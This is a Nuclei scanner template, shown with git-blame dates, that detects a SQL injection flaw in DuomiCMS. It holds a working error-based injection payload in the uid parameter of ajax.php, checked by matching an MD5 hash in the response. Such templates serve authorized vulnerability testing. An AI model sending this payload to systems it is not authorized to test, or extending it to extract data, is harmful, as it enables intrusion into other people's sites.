nuclei-templates/vulnerabilities/other/duomicms-sql-injection.yaml

27 lines
561 B
YAML
Raw Normal View History

2021-02-26 15:44:31 +00:00
id: duomicms-sql-injection
info:
name: DuomiCMS SQL Injection
author: pikpikcu
severity: high
2021-03-10 14:15:41 +00:00
reference: https://redn3ck.github.io/2016/11/01/duomiCMS/
2021-02-26 15:44:31 +00:00
tags: duomicms,sqli
requests:
- method: GET
path:
- "{{BaseURL}}/duomiphp/ajax.php?action=addfav&id=1&uid=1%20and%20extractvalue(1,concat_ws(1,1,md5(9999999999)))"
matchers-condition: and
matchers:
- type: word
words:
- "e0ec043b3f9e198ec09041687e4d4e8d"
part: body
condition: and
- type: status
status:
- 200